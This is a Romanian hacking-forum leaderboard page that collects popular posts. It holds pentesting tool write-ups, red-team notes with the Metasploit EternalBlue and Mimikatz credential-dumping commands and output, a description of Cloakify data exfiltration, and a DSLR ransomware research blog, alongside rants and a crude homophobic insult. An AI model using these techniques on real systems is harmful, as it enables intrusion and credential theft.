Jump to content

Leaderboard


Popular Content

Showing content with the highest reputation since 07/19/19 in all areas

  1. 11 points
    https://www.politiaromana.ro/ro/copii-disparuti 17 copii disparuti https://www.politiaromana.ro/ro/persoane-disparute 350 de adulti disparuti Nu-i pasa nimanui ca nu ai cum sa afli de ei decat daca vizitezi paginile alea. Dar apare un caz la TV in emisiunile colorate sa atraga atentia idiotilor si toata tara ia foc cum ca nu functioneaza sistemul. Si absolut tot ce reusiti sa faceti e sa amestecati intr-o oala cu cacat care nu va duce niciodata nicaieri. Rasuciti aceleasi idei invechite pe-o parte si pe-alta ca sa dati impresia ca voua chiar va pasa, fara niciun rezultat. Absolut in fiecare caz e la fel. Hai sa presupunem ca se "mobilizeaza" toti hackerii din univers si o gasesc pe fata aia. Ce s-a rezolvat? Au salvat o viata, cum ramane cu restul de 367? Cum decizi ce caz e mai urgent de rezolvat? De ce sa mobilizam hackeri pentru o problema care nu tine de ei? Hackerii aia nu au si ei ocupatiile si problemele lor? Cine-i manageriaza pe hackeri astfel incat sa lucreze cat mai eficient? Si vorbim doar despre domeniul oamenilor disparuti aici. Imagineaza-ti doar cata lume are altfel de probleme urgente din alte domenii. De-aia au aparut organizatii precum politia, spitalele, armata, s.a.m.d, sa se poata mobiliza, sa aibe deja un raspuns la intrebarile alea si sa-si faca treaba. Si sa presupunem ca totusi se intampla o minune si se mobilizeaza hackerii si rezolva cazul, cum ramane cu problema de baza si anume ca un sistem infiintat pentru a rezolva astfel de probleme, nu functioneaza? De ce nu se protesteaza impotriva lui? Poate pentru ca suntem constienti ca natie ca nimeni nu ar fi in stare sa faca o treaba mai buna? Sau poate doar nu ne pasa mai mult de un joc de imaginatie prostesc pe care-l exercita cei ca tine acum. Nu are niciun sens sa concentrezi atentia tuturor pe un anumit lucru, cu atat mai putin a celor care nu se ocupa cu asta, pentru ca tot ce-ai obtine intr-un final e o clona a sistemului actual. Ce rost are sa reinventezi roata? Singura optiune e sa militezi pentru rezolvarea problemelor din sectoarele abilitate. In alta ordine de idei, de ce exista persoane ca tine care nu pot sa conceapa ca un lucru nu poate fi rezolvat? Uite o statistica cu crimele din Romania de anul trecut, imagineaza-ti cate sunt nerezolvate si acum. Sigur, intervine mereu in discutie situatia utopica in care toata lumea se mobilizeaza sa rezolve ceva anume, dar de cate ori s-a intamplat asta dealungul istoriei? Si, mai ales, in care univers e posibil asa ceva? E doar o idee aruncata in vant de mancatori de cacat ca sa creeze vizualizari pe bloguri si emisiuni. BREAKING NEWS: Realitate e urata, se intampla crime care nu vor fi rezolvate la timp, toata lumea are probleme de rezolvat, iar emisiunile colorate fac bani din numarul de urmaritori si se incheie la o ora predefinita, deci, oare cat le pasa lor de ce se intampla cu adevarat, daca la sfarsitul orei se incheie emisiunea si incepe un film de comedie?! Food for thought.
  2. 8 points
    După ce faceți muncă pe 2 lei, mai luați și țeapă. Bravo, așa meritați.
  3. 6 points
    Ești un gay Ești o gay Ești maro la chiloței
  4. 6 points
  5. 6 points
    Ba, urmaresc forumu asta din umbra de ceva timp, nu am mai postat. Dar cat puteti ba sa fiti de terminati? Oare prostia asta a voastra nu are limite? Ce baza de date ba, ca aia era cu persoane de prin anii 90'. 80% din cei care sunt in baza aia de date au murit. Numa invitatii filelist, coduri, dork-uri si baze de date visati. Sa faceti ceva pentru viitoru vostru n-ati face. Ai aici oameni care sunt guru in Linux, care stiu Python si alte lucruri utile si voi cereti baze de date.
  6. 6 points
  7. 6 points
  8. 6 points
    Ala cred e fratele vostru de aici :))) kfollow si celalalte 20 de nicknames
  9. 5 points
    Sursa: https://github.com/blaCCkHatHacEEkr/PENTESTING-BIBLE/blob/master/README.md PENTESTING-BIBLE hundreds of ethical hacking & penetration testing & red team & cyber security & computer science resources. MORE THAN 1000 LINK MORE TO COME
  10. 5 points
    PDF Link : https://github.com/blackorbird/APT_REPORT/blob/master/exploit_report/%23bluekeep RDP from patch to remote code execution.pdf
  11. 5 points
    Check Point Software Technologies issued a report today that detailed how its security researchers were able to remotely install malware on a digital DSLR camera. Ransomware has become a major threat to computer systems in recent years, as high-profile attacks have locked users out of personal computers, hospitals, city governments, and even The Weather Channel. Now, security researchers have discovered that another device that might be at risk: a DSLR camera. Check Point Software Technologies issued a report today that detailed how its security researchers were able to remotely install malware on a digital DSLR camera. In it, researcher Eyal Itkin found that a hacker can easily plant malware on a digital camera. He says that the standardized Picture Transfer Protocol is an ideal method for delivering malware: it’s unauthenticated and can be used with both Wi-Fi and USB. The report notes that individual with an infected Wi-Fi access point could deploy it at a tourist destination to pull off an attack, or infect a user’s PC. Reference Link : https://www.blackhatethicalhacking.com/dslr-cameras-vulnerable-to-ransomware-attack/
  12. 5 points
    Security Tool Chest Anticipating and mitigating security threats is critical during software development. This paper is going to detail and investigate security vulnerabilities and mitigation strategies to help software developers build secure applications and prevent operating system leaks. This paper examines common vulnerabilities, and provides relevant mitigation strategies, from several relevant perspectives. This paper hopes to encompasses the cyber Kill chain as part of the five stage compramision stages, displaying relevant tools, books and strategies at each stage. Contents Reconnaissance Weaponization Delivery Command and Control Lateral Movement Establish Foothold Escalate Privileges Data Exfiltration DLL Architecture References Reference Link : https://github.com/jmscory/Security-Tool-Chest/blob/master/README.md#reconnaissance
  13. 5 points
    Am adaugat suport pentru Windows x64, Linux x86 si Linux x64. https://www.defcon.org/html/defcon-27/dc-27-demolabs.html#Shellcode Compiler
  14. 5 points
  15. 5 points
    BeRoot is a post-exploitation tool to check for common misconfigurations which can allow an attacker to escalate their privileges. The main goal of BeRoot is to print only the information that has been found as a possible way for privilege escalation rather than a configuration assessment of the host by listing all services, all processes, all network connection, etc. This project works on Windows, Linux, and Mac OS. But in this demonstration, we will be working on Ubuntu Desktop. Downloading BeRoot It can be downloaded in the Kali Linux with the following command; git clone https://github.com/AlessandroZ/BeRoot.git Once the download completes, make sure you have python3 installed as it is a pre-requisite for running it. You need to navigate to its downloaded directory to run it; Running BeRoot We will first look for the help file; python3 beroot.py -h So it seems that this is a type of tool which directly runs with no necessary information in the help option. So I will run directly in the host’s shell. python3 beroot.py -h Now, it will try to analyze all the possible loopholes which could lead to the escalation of privileges using SUID bins, checking file permissions, sudo rules, NFS squashing, docker, and kernel exploits. As you observe now that it is showing the output of the configurations that could lead to the exploitation of privilege. So far I will check with one of the commands which the BeRoot had shown in the results if it is working or not; It worked successfully, it will also show another output command and exploits according to the operating system in the results. Sursa: https://latesthackingnews.com/2019/08/02/beroot-a-post-exploitation-privilege-escalation-tool/
  16. 5 points
    Hackforums este un shithole plin de prepubertari in calduri, si cacanari care vand ebookuri de "facut bani". RST are o prestanta mai mare decat nimicuri de-astea de 2 lei. Administratorul Hackforums e constient de treaba asta, de-aia a bagat si rank contracost, si tot felul de balarii de-astea, deoarece copiii pun botul si vor sa aiba rank mare, ca pe metin, sa fie smecheri virtual.
  17. 5 points
    Maday.conf ( https://www.mayday-conf.com ) este prima conferinta internationala de cyber security din Cluj Napoca (24-25 octombrie) iar RST este community partener al evenimentului. Acest eveniment s-a nascut din pasiunea pentru security si isi doreste in primul rand sa ajute la dezvoltarea oamenilor care sunt interesati de acest domeniu. In timpul evenimentului o sa aiba loc prezentari referitoare la ultimele tehnici folosite de pentesteri, de Incident Responders dar si lucruri precum identificarea TTPs folosite de catre atacatori. Mai mult, in cadrul evenimentului o sa avem CTF-uri cu premii, exercitii cyber dar si workshop-uri. Pentru a primi notificari in timp real va puteti abona la newsletter pe www.mayday-conf.com, follow la pagina de Facebook ( https://www.facebook.com/MayDayCon ) / Twitter ( https://twitter.com/ConfMayday) sau intra pe grupul de Slack ( https://maydayconf.slack.com/join/shared_invite/enQtNTc5Mzk0NTk0NTk3LWVjMTFhZWM2MTVlYmQzZjdkMDQ5ODI1NWM3ZDVjZGJkYjNmOGUyMjAxZmQyMDlkYzg5YTQxNzRmMmY3NGQ1MGM) Acum urmeaza surpriza... Pentru ca "sharing is caring" organizatorii ofera membrilor RST 10 vouchere de acces pentru ambele zile. Acestea pot fi obtinute printr-un private message catre Nytro (care sa includa o adresa de email) pana la data de 1 septembrie iar selectia se va face in functie de urmatoarele criterii: - numarul de postari pe forum - numarul de like-uri si upvote-uri primite pe postari - proiecte publicate in forum - vechimea pe RST URL: https://www.mayday-conf.com
  18. 5 points
  19. 4 points
  20. 4 points
    LDAPDomainDump Active Directory information dumper via LDAP Introduction In an Active Directory domain, a lot of interesting information can be retrieved via LDAP by any authenticated user (or machine). This makes LDAP an interesting protocol for gathering information in the recon phase of a pentest of an internal network. A problem is that data from LDAP often is not available in an easy to read format. ldapdomaindump is a tool which aims to solve this problem, by collecting and parsing information available via LDAP and outputting it in a human readable HTML format, as well as machine readable json and csv/tsv/greppable files. The tool was designed with the following goals in mind: Easy overview of all users/groups/computers/policies in the domain Authentication both via username and password, as with NTLM hashes (requires ldap3 >=1.3.1) Possibility to run the tool with an existing authenticated connection to an LDAP service, allowing for integration with relaying tools such as impackets ntlmrelayx The tool outputs several files containing an overview of objects in the domain: domain_groups: List of groups in the domain domain_users: List of users in the domain domain_computers: List of computer accounts in the domain domain_policy: Domain policy such as password requirements and lockout policy domain_trusts: Incoming and outgoing domain trusts, and their properties As well as two grouped files: domain_users_by_group: Domain users per group they are member of domain_computers_by_os: Domain computers sorted by Operating System Dependencies and installation Requires ldap3 > 2.0 and dnspython Both can be installed with pip install ldap3 dnspython The ldapdomaindump package can be installed with python setup.py install from the git source, or for the latest release with pip install ldapdomaindump. Usage There are 3 ways to use the tool: With just the source, run python ldapdomaindump.py After installing, by running python -m ldapdomaindump After installing, by running ldapdomaindump Help can be obtained with the -h switch: usage: ldapdomaindump.py [-h] [-u USERNAME] [-p PASSWORD] [-at {NTLM,SIMPLE}] [-o DIRECTORY] [--no-html] [--no-json] [--no-grep] [--grouped-json] [-d DELIMITER] [-r] [-n DNS_SERVER] [-m] HOSTNAME Domain information dumper via LDAP. Dumps users/computers/groups and OS/membership information to HTML/JSON/greppable output. Required options: HOSTNAME Hostname/ip or ldap://host:port connection string to connect to (use ldaps:// to use SSL) Main options: -h, --help show this help message and exit -u USERNAME, --user USERNAME DOMAIN\username for authentication, leave empty for anonymous authentication -p PASSWORD, --password PASSWORD Password or LM:NTLM hash, will prompt if not specified -at {NTLM,SIMPLE}, --authtype {NTLM,SIMPLE} Authentication type (NTLM or SIMPLE, default: NTLM) Output options: -o DIRECTORY, --outdir DIRECTORY Directory in which the dump will be saved (default: current) --no-html Disable HTML output --no-json Disable JSON output --no-grep Disable Greppable output --grouped-json Also write json files for grouped files (default: disabled) -d DELIMITER, --delimiter DELIMITER Field delimiter for greppable output (default: tab) Misc options: -r, --resolve Resolve computer hostnames (might take a while and cause high traffic on large networks) -n DNS_SERVER, --dns-server DNS_SERVER Use custom DNS resolver instead of system DNS (try a domain controller IP) -m, --minimal Only query minimal set of attributes to limit memmory usage Options Authentication Most AD servers support NTLM authentication. In the rare case that it does not, use --authtype SIMPLE. Output formats By default the tool outputs all files in HTML, JSON and tab delimited output (greppable). There are also two grouped files (users_by_group and computers_by_os) for convenience. These do not have a greppable output. JSON output for grouped files is disabled by default since it creates very large files without any data that isn't present in the other files already. DNS resolving An important option is the -r option, which decides if a computers DNSHostName attribute should be resolved to an IPv4 address. While this can be very useful, the DNSHostName attribute is not automatically updated. When the AD Domain uses subdomains for computer hostnames, the DNSHostName will often be incorrect and will not resolve. Also keep in mind that resolving every hostname in the domain might cause a high load on the domain controller. Minimizing network and memory usage By default ldapdomaindump will try to dump every single attribute it can read to disk in the .json files. In large networks, this uses a lot of memory (since group relationships are currently calculated in memory before being written to disk). To dump only the minimal required attributes (the ones shown by default in the .html and .grep files), use the --minimal switch. Visualizing groups with BloodHound LDAPDomainDump includes a utility that can be used to convert ldapdomaindumps .json files to CSV files suitable for BloodHound. The utility is called ldd2bloodhound and is added to your path upon installation. Alternatively you can run it with python -m ldapdomaindump.convert or with python ldapdomaindump/convert.py if you are running it from the source. The conversion tool will take the users/groups/computers/trusts .json file and convert those to group_membership.csv and trust.csv which you can add to BloodHound. License MIT Sursa: https://github.com/dirkjanm/ldapdomaindump
  21. 4 points
    How To Scan Vulnerabilities With Nmap NSE? Nmap is a very popular and powerful network-scanning tool. Used by all the hackers, script kiddies, pentesters, security researchers... on this world. Nmap is compatible with Windows, BSD, Mac OS X, Linux. Scan vulnerabilities with vulscan vulscan is a Nmap's module which enhances Nmap to a vulnerability scanner. The nmap option -sV enables version detection per service which is used to determine potential flaws according to the identified product. The data is looked up in an offline version of VulDB. Scan vulnerabilities with nmap-vulners nmap-vulners is a NSE script using vulnerabilities database from Vulners.com to detect vulnerabilities on target. Reference Link : https://githacktools.blogspot.com/2019/08/how-to-scan-vulnerabilities-with-nmap-nse.html?fbclid=IwAR1VFZn5MOmZGS0kcNUBU1-VkXK0IfRsPbeDIwQYKsXt91xbyTr-LHj0IXk
  22. 4 points
    Ca sa va distrati putin si sa va gadilati paranoia https://iknowwhatyoudownload.com/en/peer/ (nu functioneaza decat cu IPv4). Parerea mea (total neavizata si lipsita de orice urma de importanta), daca vrei neaparat sa nu ai probleme, inchiriezi un server intr-un datancenter ce este intr-o tara cu legislatie mai laxa din acest punct de vedere (ideal ar fi si sediul acelei firme sa fie tot intr-o astfel de tara), si tii acolo clientul de torrents. Iar de acolo le iei prin ssh (scp/sftp). Daca ceea ce am prezentat mai sus suna prea complicat, o alta sugestie ar fi sa: dezactivezi din clientul de torrent orice metoda de a descoperi peers/seeds in afara tracker-ului activezi doar conexiuni securizate/criptate (desi nu sunt sigur ce impact ar avea asupra disponibilitatii seeds/peers) DISCLAIMER: Sunt Roman. Desi (probabil) nu stiu stiu despre ce e vorba, eu am o opinie puternica, si sunt sigur ca opinia mea e adevarul absolut, iar telul meu in viata, dat de la Ceruri, este sa conving restul lumii de adevarul meu.
  23. 4 points
    Nu permitem lucruri ilegale pe forum, gen sa se obtina acces la anumite site-uri sau pagini/profiluri de Facebook. In plus, hackforums e o mizerie.
  24. 4 points
    Ai vrea s-o confrunti pe gagica-ta daca te inseala, dar inainte ai vrea sa-i violezi intimitatea sa te asiguri. Posibile scenarii: - Daca afli ca te inseala, la nivelul de cuckery pe care-l manifesti, cel mai probabil n-o sa zici nimic si o sa te comporti ca un zeu atotstiutor in orice conversatie viitoare cu ea, o s-o arzi passive aggressive pana se lepada de tine si apucaturile tale ciudate. - Daca afli ca nu te inseala, esti un cacanar care citeste conversatiile altora din propria nesiguranta si slabiciune. Nu mai bine o intrebi direct? Oricum la nivelul asta de gelozie nu o sa fie ultima oara cand o sa incerci astfel de cacaturi. Macar te calesti si-ti mai creste toleranta pentru urmatoarea relatie.
  25. 4 points
    32/64 bits version Sharing is caring Download link : https://mega.nz/?fbclid=IwAR3DhN9QsjIrDsdGHq-HQPjh15ghzefhx28wUUBZ0UGdeTyfhmutezFclSQ#F!8xh1EIyI!5cZd5_e-LI4Akw7YVYoBNA
  26. 4 points
    A Red-Teamer diaries This is publicly accessible personal notes about my pentesting/red teaming experiments in a controlled environment that involve playing with various tools and techniques used by penetration testers, red teams and advanced adversaries. Project in progress Intrusion Kill Chain Mapping the Network RunFinger.py Gather information about the Domain name and windows machine running in the network bash$ cd /usr/share/Responder/tools bash$ sudo python RunFinger.py -i 192.168.1.1/24 or bash$ responder-RunFinger Nbtscan Scanning IP networks for NetBIOS name information. bash$ sudo nbtscan -v -s : 192.168.1.0/24 Crackmapexec v 4.0 Scan the network range based on the SMB information bash$ cme smb 192.168.1.1/24 Nmap scan Scan all the machine network and save the outputs . -oA options : Means output with all format -T4 : Fast scan Fast Scan bash$ nmap -p 1-65535 -sV -sS -T4 -oA output target_IP Intensive Scan (Note recommended): bash$ nmap -p 1-65535 -Pn -A -oA output target_IP Scan with enumeration of the running services version : -sC : Safe Scan -sV : Get the service version bash$ nmap -sC -sV -oA output target Angry IP scanner Download the tool from this link : Angry IP Scanner Change the preferences settings Go to : Preferences -> Ports -> add 80,445,554,21 ,22 in the port selection Go to : Preferences -> Display -> select Alive Hosts Go to : Preferences -> Pinging -> select Combained (UDP/TCP) Lateral Movement and Exploiting Scanning for EternalBlue ms17-010 bash$ nmap -p445 --script smb-vuln-ms17-010 <target>/24 If the target is vulnrable the output is as following Script Output Host script results: | smb-vuln-ms17-010: | VULNERABLE: | Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010) | State: VULNERABLE | IDs: CVE:CVE-2017-0143 | Risk factor: HIGH | A critical remote code execution vulnerability exists in Microsoft SMBv1 | servers (ms17-010). | | Disclosure date: 2017-03-14 | References: | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143 | https://technet.microsoft.com/en-us/library/security/ms17-010.aspx |_ https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/ Exploiting Eternal Blue - Metasploit Module (Windows 7 x64 only ) Note : The default Module supported by Metasploit is exploiting only windows 7 x64 bit Otherwise the target will be crashed . msf > use exploit/windows/smb/ms17_010_eternalblue msf exploit(ms17_010_eternalblue) > show targets ...targets... msf exploit(ms17_010_eternalblue) > set TARGET <target-id> msf exploit(ms17_010_eternalblue) > show options ...show and set options... msf exploit(ms17_010_eternalblue) > exploit Mimikatz - Metasploit After obtaining a meterpreter shell, we need to ensure that our session is running with SYSTEM level privileges for Mimikatz to function properly. meterpreter > getuid Server username: WINXP-E95CE571A1\Administrator meterpreter > getsystem ...got system (via technique 1). meterpreter > getuid Server username: NT AUTHORITY\SYSTEM Reading Hashes and Passwords from Memory meterpreter > load mimikatz Loading extension mimikatz...success. meterpreter > msv [+] Running as SYSTEM [*] Retrieving msv credentials msv credentials =============== AuthID Package Domain User Password ------ ------- ------ ---- -------- 0;78980 NTLM WINXP-E95CE571A1 Administrator lm{ 00000000000000000000000000000000 }, ntlm{ d6eec67681a3be111b5605849505628f } 0;996 Negotiate NT AUTHORITY NETWORK SERVICE lm{ aad3b435b51404eeaad3b435b51404ee }, ntlm{ 31d6cfe0d16ae931b73c59d7e0c089c0 } 0;997 Negotiate NT AUTHORITY LOCAL SERVICE n.s. (Credentials KO) 0;56683 NTLM n.s. (Credentials KO) 0;999 NTLM WORKGROUP WINXP-E95CE571A1$ n.s. (Credentials KO) meterpreter > kerberos [+] Running as SYSTEM [*] Retrieving kerberos credentials kerberos credentials ==================== AuthID Package Domain User Password ------ ------- ------ ---- -------- 0;999 NTLM WORKGROUP WINXP-E95CE571A1$ 0;997 Negotiate NT AUTHORITY LOCAL SERVICE 0;56683 NTLM 0;996 Negotiate NT AUTHORITY NETWORK SERVICE 0;78980 NTLM WINXP-E95CE571A1 Administrator SuperSecretPassword meterpreter > mimikatz_command -f sekurlsa::searchPasswords [0] { Administrator ; WINXP-E95CE571A1 ; SuperSecretPassword } meterpreter > mimikatz_command -f sekurlsa::logonpasswords And many more... enjoy Download Link : https://github.com/ihebski/A-Red-Teamer-diaries?fbclid=IwAR2QfukPc5Eev-jwMpX28e4s6tOQ4uHYGkTRWdClv2ZQVHEqT8g7BksjSMI
  27. 4 points
    Cam liniste pe aici
  28. 3 points
    Salut, te-ai pierdut?
  29. 3 points
    website-checks website-checks checks websites with multiple services. These are currently: crt.sh CryptCheck HSTS Preload List HTTP Observatory Lighthouse PageSpeed Insights Security Headers SSL Decoder SSLLabs webbkoll webhint Installation npm i -g danielruf/website-checks yarn global add danielruf/website-checks Usage website-checks example.com Change output directory website-checks example.com --output pdf would save all PDF files to the local pdf directory. CLI flags By default all checks (except --ssldecoder) will run. If you want to run only specific checks you can add CLI flags. Currently the following CLI flags will run the matching checks: --crtsh --cryptcheck --hstspreload --httpobservatory --lighthouse --psi --securityheaders --ssldecoder --ssldecoder-fast --ssllabs --webbkoll --webhint For example website-checks example.com --lighthouse --securityheaders will run the Lighthouse and Security Headers checks. Known issues missing Chrome / Chromium dependency for Windows binary (.exe) On Windows it may happen that the bundled binary throws the following error: UnhandledPromiseRejectionWarning: Error: Chromium revision is not downloaded. Run "npm install" or "yarn install" at Launcher.launch This is a known issue with all solutions like pkg and nexe and expected as Chromium is not bundled with the binary which would make it much bigger. In most cases it should be solved by globally installing puppeteer or by having Chrome or Chromium installed and in PATH. Sursa: https://github.com/DanielRuf/website-checks
  30. 3 points
    Salut, Desi apare destul de mult in referintele de pe forum: https://rstforums.com/forum/search/?q=Samsclass.info , i-am dat atentie abia de curand, cand am avut ceva de facut legat de Android. Sunt foarte multe resurse utile asa ca aveti ce invata: https://samsclass.info/ Succes!
  31. 3 points
    Cred ca ar fi util sa incepi sa iti folosesti creierul.
  32. 3 points
    Synopsis: Following the wrong link could allow remote attackers to control your WiFi router, Google Home, Roku, Sonos speakers, home thermostats and more. Link: https://medium.com/@brannondorsey/attacking-private-networks-from-the-internet-with-dns-rebinding-ea7098a2d325 Stiu ca e destul de "fumat" subiectul, dar mi s-a parut interesant articolul.
  33. 3 points
    Cloakify Factory is a tool to transforms any file type into a list of harmless and even useless looking strings. This ability allows for you to hide a data file in plain sight and also transfer it over the network without triggering malware alerts. The functionality which Claokify utilizes is called text-based steganography that protects the data by making it look benign. The cloaked files defeat signature-based malware detection tools, DLP, etc. In this demonstration, we will be working on Kali Linux. Downloading Cloakify It can be downloaded in the Kali Linux with the following command; git clone https://github.com/TryCatchHCF/Cloakify.git Once the download completes, make sure you have python2.7 installed as it is a pre-requisite for running it. You need to navigate to its downloaded directory to run it; Running Cloakify Let’s run the tool by the following command; python cloakifyFactory.py So as it seems that Cloakify Factory has a menu-driven tool that leverages its script set. When you choose a file to Cloakify, it first converts it into theBase64-encode, then applies a ciphertext to generate a list that encodes the Base64 payload. And then the cloaked data can be transferred to your desired destination. Let’s start cloakifying it the file which contains by data which you can see below; Now I will encode this data. Now as the data is encoded, I will check for my output data file which was processed by Cloakify; As data is encoded, so now it as exfiltrated, choose Decloakify with the same cipher to decode the payload. Now check for the data, if it reverted to the original state or not. It worked successfully, as all the data get converted back to the actual state. Sursa: https://latesthackingnews.com/2019/07/30/cloakify-a-tool-to-mask-your-data-in-plain-sight/
  34. 3 points
    Salut, din motive pe care le voi expune mai tarziu, sa zicem ca ma numesc " Four ", motivul acestui nume, din nou, va fi scos la iveala putin mai tarziu. Bun, astea fiind spuse voi trece direct la subiect. Am nevoie sa vorbesc cu cineva despre un anume subiect si m am gandit ca tu ai fi persoana potrivita. Am nevoie de putin ajutor pentru a rezolva o problema care deja ma apasa de cateva luni..cand ai timp si crezi ca mesajul meu este relevant, te rog sa mi raspunzi. Numai bine, Four. #mars
  35. 3 points
    Vorbeste cu @jreister in privat, are cod de vanzare fix pentru asa ceva.
  36. 3 points
    Iti dau eu 10 dolari pe saptamana daca citesti despre ElasticSearch si imi faci cate un programel in pyton legat de ElasticSearch (cate 1 pe sapt). Ce zici?
  37. 3 points
    Acunetix si havij sa moara dujmani de ciuda baaaaaaaaaaaaaaaaaaaaaaaaaaa
  38. 3 points
    Primele 10 tepe sunt benefice pentru cariera voastra internationala. Tot raul spre bine. Nu mai lucrati cu romani.
  39. 3 points
    bine ai venit si enjoy your stay Dai cu search vei gasi multe resurse
  40. 3 points
    Pentru port scanning merge si GNU netcat. Permite single port, sau range. nc -z 127.0.0.1 80 && echo open # sau nc -zv 127.0.0.1 80-1024 # verbose printing
  41. 3 points
    https://haveibeenpwned.com/ E doar pentru a verifica daca i-a aparut emailul in vreun dump public. Nu te gandi ca gasesti si parolele. Alea le gasesti daca ajungi la dump-uri.
  42. 3 points
    Python API wrapper and command-line client for the tools hosted on spyse.com. "Spyse is a developer of complete DAAS (Data-As-A-Service) solutions for Internet security professionals, corporate and remote system administrators, SSL / TLS encryption certificate providers, data centers and business analysts. All Spyse online solutions are represented by thematic services that have a single platform for collecting, processing and aggregating information." - spyse.com Supports the following APIs: DNStable FindSubdomains CertDB ASlookup PortMap DomainsDB NOTE: This API is currently under active development. Download link : https://github.com/zeropwn/spyse.py?fbclid=IwAR1_N6pGrll9uLx5FnbbbzlCKQnjTAxITpuLlhPNDK50TkAoIeg-ULArq5w
  43. 2 points
    Say Cheese: Ransomware-ing a DSLR Camera August 11, 2019 Research by: Eyal Itkin TL;DR Cameras. We take them to every important life event, we bring them on our vacations, and we store them in a protective case to keep them safe during transit. Cameras are more than just a tool or toy; we entrust them with our very memories, and so they are very important to us. In this blog, we recount how we at Check Point Research went on a journey to test if hackers could hit us in this exact sweet spot. We asked: Could hackers take over our cameras, the guardians of our precious moments, and infect them with ransomware? And the answer is: Yes. Background: DSLR cameras aren’t your grandparents’ cameras, those enormous antique film contraptions you might find up in the attic. Today’s cameras are embedded digital devices that connect to our computers using USB, and the newest models even support WiFi. While USB and WiFi are used to import our pictures from the camera to our mobile phone or PC, they also expose our camera to its surrounding environment. Our research shows how an attacker in close proximity (WiFi), or an attacker who already hijacked our PC (USB), can also propagate to and infect our beloved cameras with malware. Imagine how would you respond if attackers inject ransomware into both your computer and the camera, causing them to hold all of your pictures hostage unless you pay ransom. Below is a Video Demonstration of this attack: Technical Details Picture Transfer Protocol (PTP) Modern DSLR cameras no longer use film to capture and later reproduce images. Instead, the International Imaging Industry Association devised a standardised protocol to transfer digital images from your camera to your computer. This protocol is called the Picture Transfer Protocol (PTP). Initially focused on image transfer, this protocol now contains dozens of different commands that support anything from taking a live picture to upgrading the camera’s firmware. Although most users connect their camera to their PC using a USB cable, newer camera models now support WiFi. This means that what was once a PTP/USB protocol that was accessible only to the USB connected devices, is now also PTP/IP that is accessible to every WiFi-enabled device in close proximity. In a previous talk named “Paparazzi over IP” (HITB 2013), Daniel Mende (ERNW) demonstrated all of the different network attacks that are possible for each network protocol that Canon’s EOS cameras supported at the time. At the end of his talk, Daniel discussed the PTP/IP network protocol, showing that an attacker could communicate with the camera by sniffing a specific GUID from the network, a GUID that was generated when the target’s computer got paired with the camera. As the PTP protocol offers a variety of commands, and is not authenticated or encrypted in any way, he demonstrated how he (mis)used the protocol’s functionality for spying over a victim. In our research we aim to advance beyond the point of accessing and using the protocol’s functionality. Simulating attackers, we want to find implementation vulnerabilities in the protocol, hoping to leverage them in order to take over the camera. Such a Remote Code Execution (RCE) scenario will allow attackers to do whatever they want with the camera, and infecting it with Ransomware is only one of many options. From an attacker’s perspective, the PTP layer looks like a great target: PTP is an unauthenticated protocol that supports dozens of different complex commands. Vulnerability in PTP can be equally exploited over USB and over WiFi. The WiFi support makes our cameras more accessible to nearby attackers. In this blog, we focus on the PTP as our attack vector, describing two potential avenues for attackers: USB – For an attacker that took over your PC, and now wants to propagate into your camera. WiFi – An attacker can place a rogue WiFi access point at a tourist attraction, to infect your camera. In both cases, the attackers are going after your camera. If they’re successful, the chances are you’ll have to pay ransom to free up your beloved camera and picture files. Introducing our target We chose to focus on Canon’s EOS 80D DSLR camera for multiple reasons, including: Canon is the largest DSLR maker, controlling more than 50% of the market. The EOS 80D supports both USB and WiFi. Canon has an extensive “modding” community, called Magic Lantern. Magic Lantern (ML) is an open-source free software add-on that adds new features to the Canon EOS cameras. As a result, the ML community already studied parts of the firmware, and documented some of its APIs. Attackers are profit-maximisers, they strive to get the maximum impact (profit) with minimal effort (cost). In this case, research on Canon cameras will have the highest impact for users, and will be the easiest to start, thanks to the existing documentation created by the ML community. Obtaining the firmware This is often the trickiest part of every embedded research. The first step is to check if there is a publicly available firmware update file in the vendor’s website. As expected, we found it after a short Google search. After downloading the file and extracting the archive, we had an unpleasant surprise. The file appears to be encrypted / compressed, as can be seen in Figure 1. Figure 1 – Byte histogram of the firmware update file. The even byte distribution hints that the firmware is encrypted or compressed, and that whatever algorithm was used was probably a good one. Skimming through the file, we failed to find any useful pattern that could potentially be a hint of the existence of the assembly code for a bootloader. In many cases, the bootloader is uncompressed, and it contains the instructions needed for the decryption / decompression of the file. Trying several decompression tools, such as Binwalk or 7Zip, produced no results, meaning that this is a proprietary compression scheme, or even an encryption. Encrypted firmware files are quite rare, due to the added costs of key management implications for the vendor. Feeling stuck, we went back to Google, and checked what the internet has to say about this .FIR file. Here we can see the major benefit of studying a device with an extensive modding community, as ML also had to work around this limitation. And indeed, in their wiki, we found this page that describes the “update protection” of the firmware update files, as deployed in multiple versions over the years. Unfortunately for us, this confirms our initial guess: the firmware is AES encrypted. Being open-source, we hoped that ML would somehow publish this encryption key, allowing us to decrypt the firmware on our own. Unfortunately, that turned out not to be the case. Not only does ML intentionally keep the encryption key secret, we couldn’t even find the key anywhere in the internet. Yet another dead end. The next thing to check was if ML ported their software to our camera model, on the chance it contains debugging functionality that will help us dump the firmware. Although such a port has yet to be released, while reading through their forums and Wiki, we did find a breakthrough. ML developed something called Portable ROM Dumper. This is a custom firmware update file that once loaded, dumps the memory of the camera into the SD Card. Figure 2 shows a picture of the camera during a ROM dump. Figure 2 – Image taken during a ROM Dump of the EOS 80D. Using the instructions supplied in the forum, we successfully dumped the camera’s firmware and loaded it into our disassembler (IDA Pro). Now we can finally start looking for vulnerabilities in the camera. Reversing the PTP layer Finding the PTP layer was quite easy, due to the combination of two useful resources: The PTP layer is command-based, and every command has a unique numeric opcode. The firmware contains many indicative strings, which eases the task of reverse-engineering it. Figure 3 – PTP-related string from the firmware. Traversing back from the PTP OpenSession handler, we found the main function that registers all of the PTP handlers according to their opcodes. A quick check assured us that the strings in the firmware match the documentation we found online. When looking on the registration function, we realized that the PTP layer is a promising attack surface. The function registers 148 different handlers, pointing to the fact that the vendor supports many proprietary commands. With almost 150 different commands implemented, the odds of finding a critical vulnerability in one of them is very high. PTP Handler API Each PTP command handler implements the same code API. The API makes use of the ptp_context object, an object that is partially documented thanks to ML. Figure 4 shows an example use case of the ptp_context: Figure 4 – Decompiled PTP handler, using the ptp_context object. As we can see, the context contains function pointers that are used for: Querying about the size of the incoming message. Receiving the incoming message. Sending back the response after handling the message. It turns out that most of the commands are relatively simple. They receive only a few numeric 